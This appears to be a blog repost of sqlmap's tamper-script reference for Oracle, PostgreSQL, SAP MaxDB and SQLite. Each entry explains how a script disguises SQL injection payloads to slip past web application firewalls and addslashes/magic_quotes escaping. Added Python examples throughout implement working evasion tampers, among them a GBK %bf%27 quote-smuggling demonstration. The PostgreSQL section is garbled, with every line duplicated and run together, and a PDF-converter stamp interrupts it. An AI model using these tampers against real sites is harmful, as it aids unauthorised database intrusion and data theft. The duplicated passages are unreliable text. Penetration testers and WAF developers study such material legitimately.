Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
Requirement:
* MySQL >= 5.1.13
Tested against:
* MySQL 5.1.41
Notes:
* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html
space2mysqldash
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
Requirement:
* MySQL
* MSSQL
Tested against:
Notes:
* Useful to bypass several web application firewalls.
space2plus
Replaces space character (' ') with plus ('+')
Notes:
* Is this useful at all? The plus gets url-encoded by the sqlmap engine, invalidating the query afterwards
* This tamper script works against all databases
space2randomblank
Replaces space character (' ') with a random blank character from a valid set of alternate characters
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass several web application firewalls
unionalltounion
Replaces UNION ALL SELECT with UNION SELECT
unmagicquotes
Replaces quote character (') with a multi-byte combo %bf%27 together with a generic comment at the end (to make it work)
Notes:
* Useful for bypassing magic_quotes/addslashes feature
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
versionedkeywords
Encloses each non-function keyword with versioned MySQL comment
Requirement:
* MySQL
Tested against:
* MySQL 4.0.18, 5.1.56, 5.5.11
Notes:
* Useful to bypass several web application firewalls when the back-end database management system is MySQL
versionedmorekeywords
Encloses each keyword with versioned MySQL comment
Requirement:
* MySQL >= 5.1.13
Tested against:
* MySQL 5.1.56, 5.5.11
Notes:
* Useful to bypass several web application firewalls when the back-end database management system is MySQL
xforwardedfor
Appends a fake HTTP header 'X-Forwarded-For' to bypass WAF (usually application based) protection
Oracle
--tamper=between,charencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor
between
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
Replaces equals operator ('=') with 'BETWEEN # AND #'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script should work against all (?) databases
charencode
URL-encodes all characters in a given payload (not processing already encoded)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS
equaltolike
Replaces all occurrences of operator equal ('=') with operator 'LIKE'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=')
* The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases
greatest
Replaces greater than operator ('>') with 'GREATEST' counterpart
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the greater than character
* The GREATEST clause is a widespread SQL command. Hence, this tamper script should work against the majority of databases
multiplespaces
Adds multiple spaces around SQL keywords
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written permissive regular expressions
Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
nonrecursivereplacement
Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters
Notes:
* Useful to bypass very weak custom filters
randomcase
Replaces each keyword character with random case value
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written permissive regular expressions
* This tamper script should work against all (?) databases
securesphere
Appends a specially crafted string
Notes:
* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163
space2comment
Replaces space character (' ') with comments '/**/'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
space2plus
Replaces space character (' ') with plus ('+')
Notes:
* Is this useful at all? The plus gets url-encoded by the sqlmap engine, invalidating the query afterwards
* This tamper script works against all databases
space2randomblank
Replaces space character (' ') with a random blank character from a valid set of alternate characters
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass several web application firewalls
unionalltounion
Replaces UNION ALL SELECT with UNION SELECT
unmagicquotes
Replaces quote character (') with a multi-byte combo %bf%27 together with a generic comment at the end (to make it work)
Notes:
* Useful for bypassing magic_quotes/addslashes feature
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
xforwardedfor
Appends a fake HTTP header 'X-Forwarded-For' to bypass WAF (usually application based) protection
PostgreSQL
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,xforwardedfor
betweenbetween
Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’
Replaces equals operator (‘=’) with ‘BETWEEN # AND #’Replaces equals operator (‘=’) with ‘BETWEEN # AND #’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the greater than characterfilter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script* The BETWEEN clause is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
charencodecharencode
Url-encodes all characters in a given payload (not processing alreadyUrl-encodes all characters in a given payload (not processing already
encoded)encoded)
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak web application firewalls that do not* Useful to bypass very weak web application firewalls that do not
url-decode the request before processing it through their ruleseturl-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind,* The web server will anyway pass the url-decoded version behind,
hence it should work against any DBMShence it should work against any DBMS
charunicodeencodecharunicodeencode
Unicode-url-encodes non-encoded characters in a given payload (notUnicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)processing already encoded)
Requirement:Requirement:
* ASP* ASP
* ASP.NET* ASP.NET
Tested against:Tested against:
* Microsoft SQL Server 2000* Microsoft SQL Server 2000
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 5.1.56* MySQL 5.1.56
* PostgreSQL 9.0.3* PostgreSQL 9.0.3
Notes:Notes:
* Useful to bypass weak web application firewalls that do not* Useful to bypass weak web application firewalls that do not
converted by Web2PDFConvert.com
unicode url-decode the request before processing it through theirunicode url-decode the request before processing it through their
rulesetruleset
equaltolikeequaltolike
Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the equal character (‘=’)filter the equal character (‘=’)
* The LIKE operator is SQL standard. Hence, this tamper script* The LIKE operator is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
greatestgreatest
Replaces greater than operator (‘>’) with ‘GREATEST’ counterpartReplaces greater than operator (‘>’) with ‘GREATEST’ counterpart
Tested against:Tested against:
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the greater than characterfilter the greater than character
* The GREATEST clause is a widespread SQL command. Hence, this* The GREATEST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databasestamper script should work against majority of databases
multiplespacesmultiplespaces
Adds multiple spaces around SQL keywordsAdds multiple spaces around SQL keywords
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
Reference: Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppthttps://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
nonrecursivereplacementnonrecursivereplacement
Replaces predefined SQL keywords with representationsReplaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace(“SELECT”, “”)) filterssuitable for replacement (e.g. .replace(“SELECT”, “”)) filters
Notes:Notes:
* Useful to bypass very weak custom filters* Useful to bypass very weak custom filters
percentage
Adds a percentage sign (‘%’) in front of each character (‘SELECT’ becomes ‘%S%E%L%E%C%T’; classic ASP/IIS drops a stray ‘%’ when decoding the request, so the database still sees the original keyword)
Requirement:
* ASP
Tested against:
* Microsoft SQL Server 2000, 2005
* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
randomcase
Replaces each keyword character with a random-case value (‘SELECT’ becomes e.g. ‘SeLEcT’)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written, permissive regular expressions
* This tamper script should work against all (?) databases
securesphere
Appends a specially crafted string
Notes:
* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163
space2comment
Replaces space character (‘ ‘) with comments ‘/**/’
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
space2plus
Replaces space character (‘ ‘) with plus (‘+’)
Notes:
* Is this of any use? The plus gets URL-encoded by the sqlmap engine (to ‘%2B’), invalidating the query afterwards
* This tamper script works against all databases
space2randomblank
Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass several web application firewalls
xforwardedfor
Append a fake HTTP header ‘X-Forwarded-For’ to bypass WAF (usually application based) protection
SAP MaxDB
ifnull2ifisnull,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,unionalltounion,unmagicquotes,xforwardedfor
ifnull2ifisnull
Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’
Requirement:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
Tested against:
* MySQL 5.0 and 5.5
Notes:
* Useful to bypass very weak and bespoke web application firewalls that filter the IFNULL() function
nonrecursivereplacement
Replaces predefined SQL keywords with representations that survive a single, non-recursive replacement filter (e.g. .replace(“SELECT”, “”)): ‘SELECT’ becomes ‘SELSELECTECT’, and removing ‘SELECT’ once leaves ‘SELECT’ behind
Notes:
* Useful to bypass very weak custom filters
randomcase
Replaces each keyword character with a random-case value (‘SELECT’ becomes e.g. ‘SeLEcT’)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written, permissive regular expressions
* This tamper script should work against all (?) databases
securesphere
Appends a specially crafted string
Notes:
* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163
space2comment
Replaces space character (‘ ‘) with comments ‘/**/’
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
space2plus
Replaces space character (‘ ‘) with plus (‘+’)
Notes:
* Is this of any use? The plus gets URL-encoded by the sqlmap engine (to ‘%2B’), invalidating the query afterwards
* This tamper script works against all databases
unionalltounion
Replaces UNION ALL SELECT with UNION SELECT
unmagicquotes
Replaces quote character (‘) with a multi-byte combo %bf%27 together with a generic comment at the end (to make it work)
Notes:
* Useful for bypassing the magic_quotes/addslashes feature when the database connection uses a multi-byte character set such as GBK, where the escaping backslash is swallowed into a two-byte character
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
xforwardedfor
Append a fake HTTP header ‘X-Forwarded-For’ to bypass WAF (usually application based) protection
SQLite
ifnull2ifisnull,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2dash,space2plus,unionalltounion,unmagicquotes,xforwardedfor
ifnull2ifisnull
Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’
Requirement:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
Tested against:
* MySQL 5.0 and 5.5
Notes:
* Useful to bypass very weak and bespoke web application firewalls that filter the IFNULL() function
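
The IFNULL(A, B) -> IF(ISNULL(A), B, A) rewrite that ifnull2ifisnull performs (listed under SAP MaxDB above and under SQLite here), as an added example and not sqlmap's own script. The arguments can themselves contain parentheses, nested IFNULL() calls and commas inside string literals, so the example uses a small scanner rather than a regex; it assumes the function name is written directly before its opening parenthesis.

```python
# Added example, not sqlmap's own tamper script: rewrite IFNULL(A, B) as
# IF(ISNULL(A),B,A), handling nested calls, parentheses inside the
# arguments and commas inside quoted strings.

def _matching_paren(s, open_idx):
    """Index of the ')' that closes s[open_idx] == '(', ignoring quoted text."""
    depth, quote = 0, None
    for i in range(open_idx, len(s)):
        c = s[i]
        if quote:
            if c == quote:
                quote = None
        elif c in ("'", '"'):
            quote = c
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return i
    raise ValueError("unbalanced parentheses in payload")


def _split_top_level_args(s):
    """Split an argument list on the commas at depth 0 and outside quotes."""
    depth, quote, parts, cur = 0, None, [], []
    for c in s:
        if quote:
            if c == quote:
                quote = None
        elif c in ("'", '"'):
            quote = c
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
        elif c == "," and depth == 0:
            parts.append("".join(cur).strip())
            cur = []
            continue
        cur.append(c)
    parts.append("".join(cur).strip())
    return parts


def ifnull2ifisnull(payload, **kwargs):
    """sqlmap-style tamper: IFNULL(A, B) -> IF(ISNULL(A),B,A), innermost calls
    included; anything that is not a two-argument IFNULL is left untouched."""
    if not payload:
        return payload
    name = "IFNULL("
    start = payload.upper().find(name)
    try:
        while start != -1:
            if start > 0 and (payload[start - 1].isalnum() or payload[start - 1] == "_"):
                start = payload.upper().find(name, start + 1)  # part of a longer identifier
                continue
            end = _matching_paren(payload, start + len(name) - 1)
            args = _split_top_level_args(payload[start + len(name):end])
            if len(args) != 2:
                start = payload.upper().find(name, end)
                continue
            a, b = args
            payload = payload[:start] + "IF(ISNULL(%s),%s,%s)" % (a, b, a) + payload[end + 1:]
            # Resume just inside the new IF(ISNULL( so IFNULL calls nested in A or B
            # (A now appears twice) are rewritten as well.
            start = payload.upper().find(name, start + len("IF(ISNULL("))
    except ValueError:
        pass  # unbalanced input: hand the payload back unchanged
    return payload


if __name__ == "__main__":
    print(ifnull2ifisnull("SELECT IFNULL(IFNULL(a,b),'x,y') FROM t"))
```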
multiplespaces
Adds multiple spaces around SQL keywords
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written, permissive regular expressions
Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
nonrecursivereplacement
Replaces predefined SQL keywords with representations that survive a single, non-recursive replacement filter (e.g. .replace(“SELECT”, “”)): ‘SELECT’ becomes ‘SELSELECTECT’, and removing ‘SELECT’ once leaves ‘SELECT’ behind
Notes:
* Useful to bypass very weak custom filters
randomcase
Replaces each keyword character with a random-case value (‘SELECT’ becomes e.g. ‘SeLEcT’)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written, permissive regular expressions
* This tamper script should work against all (?) databases
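
multiplespaces, nonrecursivereplacement and randomcase (listed above, and earlier in the other database sections) all rely on the filter being sloppier than the database parser. The added example below is my own code, not sqlmap's: it implements the three rewrites with the tamper(payload) shape sqlmap uses and runs them against two constructed toy filters, a one-pass .replace() sanitiser and a case-sensitive single-space string match. The short keyword list and the seeded random source are this example's assumptions; sqlmap uses its full keyword table and an unseeded random source.

```python
import random
import re

# Added example, not sqlmap's or the page author's code. The keyword list and
# the seeded random source are this example's own.
KEYWORDS = ("SELECT", "UNION", "FROM", "WHERE", "AND", "OR")
_KW = re.compile(r"\b(%s)\b" % "|".join(KEYWORDS), re.IGNORECASE)
_rng = random.Random(0)   # seeded so that the output is reproducible


def randomcase(payload, **kwargs):
    """SELECT -> sElEcT: each keyword letter gets a random case."""
    return _KW.sub(lambda m: "".join(_rng.choice((c.lower(), c.upper()))
                                     for c in m.group(0)), payload)


def multiplespaces(payload, **kwargs):
    """Pad every keyword with one to four extra spaces on each side."""
    pad = lambda: " " * _rng.randint(1, 4)
    return _KW.sub(lambda m: pad() + m.group(0) + pad(), payload)


def nonrecursivereplacement(payload, **kwargs):
    """SELECT -> SELSELECTECT: deleting 'SELECT' once leaves 'SELECT' behind."""
    def wrap(m):
        kw = m.group(0)
        half = len(kw) // 2
        return kw[:half] + kw + kw[half:]
    return _KW.sub(wrap, payload)


# --- constructed toy filters of the kind these tampers are meant to defeat ---

def strip_once_filter(value):
    """Sanitiser that runs one case-sensitive .replace() per keyword."""
    for kw in KEYWORDS:
        value = value.replace(kw, "")
    return value


def naive_waf_blocks(value):
    """WAF rule that only knows upper-case 'UNION SELECT' with a single space."""
    return "UNION SELECT" in value


def as_parsed(sql):
    """Collapse what the SQL parser ignores: keyword case and runs of whitespace."""
    return re.sub(r"\s+", " ", sql).strip().upper()


if __name__ == "__main__":
    p = "1 UNION SELECT user FROM users"
    print(strip_once_filter(p))                            # keywords gone
    print(strip_once_filter(nonrecursivereplacement(p)))   # keywords back
    print(randomcase(p), multiplespaces(p), sep="\n")
```

as_parsed() is the check to keep in mind when building such payloads: a tamper is only useful if the filter sees something different while the parser still sees the same query.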
securesphere
Appends a specially crafted string
Notes:
* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163
space2comment
Replaces space character (‘ ‘) with comments ‘/**/’
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
space2dash
Replaces space character (‘ ‘) with a dash comment (‘--’) followed by a random string and a new line (‘\n’)
Requirement:
* MSSQL
* SQLite
Notes:
* Useful to bypass several web application firewalls
* Used during the ZeroNights SQL injection challenge, https://proton.onsec.ru/contest/
space2plus
Replaces space character (‘ ‘) with plus (‘+’)
Notes:
* Is this of any use? The plus gets URL-encoded by the sqlmap engine (to ‘%2B’), invalidating the query afterwards
* This tamper script works against all databases
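
The space-replacement tampers (space2comment and space2randomblank in the sections above, space2dash and space2plus here) differ only in what they put where the space was, so the added example below (my code, not sqlmap's) shares one loop that leaves spaces inside string literals alone. It assumes the quotes in the payload are balanced, uses tab/LF/FF/CR as its blank set and a seeded random source, and ends with the URL-encoding check behind the space2plus caveat: once the whole value is URL-encoded, ‘+’ travels as ‘%2B’ and the server decodes it back to a literal plus, not a space.

```python
import random
import urllib.parse

# Added example, not sqlmap's own tamper scripts. The blank set, the junk
# alphabet and the seeded random source are this example's assumptions.
_rng = random.Random(1)
BLANKS = ("\t", "\n", "\x0c", "\r")   # whitespace SQL lexers accept between tokens


def _replace_spaces(payload, make_blank):
    """Replace every space outside a quoted literal with make_blank()."""
    out, quote = [], None
    for c in payload:
        if quote:                       # inside '...' or "..."
            if c == quote:
                quote = None
        elif c in ("'", '"'):
            quote = c
        elif c == " ":
            out.append(make_blank())
            continue
        out.append(c)
    return "".join(out)


def space2comment(payload, **kwargs):
    return _replace_spaces(payload, lambda: "/**/") if payload else payload


def space2randomblank(payload, **kwargs):
    return _replace_spaces(payload, lambda: _rng.choice(BLANKS)) if payload else payload


def space2dash(payload, **kwargs):
    """'--' + random letters + newline. MSSQL and SQLite treat '--junk' as a
    comment; MySQL requires whitespace after '--', hence the requirement list."""
    def junk():
        return "--%s\n" % "".join(_rng.choice("abcdefghijklmnopqrstuvwxyz") for _ in range(6))
    return _replace_spaces(payload, junk) if payload else payload


def space2plus(payload, **kwargs):
    return _replace_spaces(payload, lambda: "+") if payload else payload


def sent_in_query_string(payload):
    """What goes on the wire after the whole value is URL-encoded: '+' becomes %2B."""
    return urllib.parse.quote(payload, safe="")


def server_decodes(query_value):
    """What a form decoder recovers: %XX escapes are decoded and a raw '+' becomes a space."""
    return urllib.parse.unquote_plus(query_value)


if __name__ == "__main__":
    print(space2comment("1 AND 'a b'='a b'"))
    wire = sent_in_query_string(space2plus("1 AND 2=2"))
    print(wire, "->", server_decodes(wire))     # the plus survives as a plus
    print(server_decodes("1+AND+2%3D2"))        # only a raw '+' turns into a space
```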
unionalltounion
Replaces UNION ALL SELECT with UNION SELECT
unmagicquotes
Replaces quote character (‘) with a multi-byte combo %bf%27 together with a generic comment at the end (to make it work)
Notes:
* Useful for bypassing the magic_quotes/addslashes feature when the database connection uses a multi-byte character set such as GBK, where the escaping backslash is swallowed into a two-byte character
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
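
Why the %bf%27 trick in unmagicquotes works, as an added example rather than the page's or sqlmap's code. PHP's addslashes() is emulated byte for byte below (it puts a backslash before ' " \ and NUL and knows nothing about character sets), and the escaped bytes are then decoded as GBK the way a MySQL connection with a GBK client charset reads them: BF 5C is a valid two-byte GBK character, so the inserted backslash is absorbed and the quote after it is live again. The appended comment text and the test payload are this example's own.

```python
# Added example, not the page's or sqlmap's code. Emulates PHP addslashes()
# (byte-wise, charset-unaware) and then reads the result as GBK, as a MySQL
# connection whose client charset is GBK would.

def addslashes(data: bytes) -> bytes:
    """PHP addslashes(): backslash before ' " \\ and NUL, one byte at a time."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):   # ' " \ NUL
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def unmagicquotes(payload: str) -> bytes:
    """Each ' becomes the bytes BF 27; a generic comment is appended so the
    rest of the original query is ignored (the comment text is this example's)."""
    return payload.encode("utf-8").replace(b"'", b"\xbf'") + b"-- -"


def as_seen_by_gbk_server(escaped: bytes) -> str:
    """BF 5C decodes to one GBK character, swallowing the escaping backslash."""
    return escaped.decode("gbk")


def has_live_quote(sql: str) -> bool:
    """True if some ' is not preceded by a backslash and so can end a literal."""
    return any(c == "'" and (i == 0 or sql[i - 1] != "\\")
               for i, c in enumerate(sql))


if __name__ == "__main__":
    plain = addslashes(b"1' OR 1=1")
    print(as_seen_by_gbk_server(plain), has_live_quote(as_seen_by_gbk_server(plain)))
    tampered = addslashes(unmagicquotes("1' OR 1=1"))
    print(as_seen_by_gbk_server(tampered), has_live_quote(as_seen_by_gbk_server(tampered)))
```

The same bytes are harmless on a UTF-8 connection, where BF 5C is simply invalid input; this is why the tamper is tied to the charset of the victim's database connection and why the reference above recommends charset-aware escaping (or parameterised queries) over addslashes().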
xforwardedfor
Append a fake HTTP header ‘X-Forwarded-For’ to bypass WAF (usually application based) protection
Tags: sqlmap, tamper
Copyright notice: unless otherwise stated, this article is an original work by mOon; please keep the source attribution when reposting.
©2012-2016 暗月|博客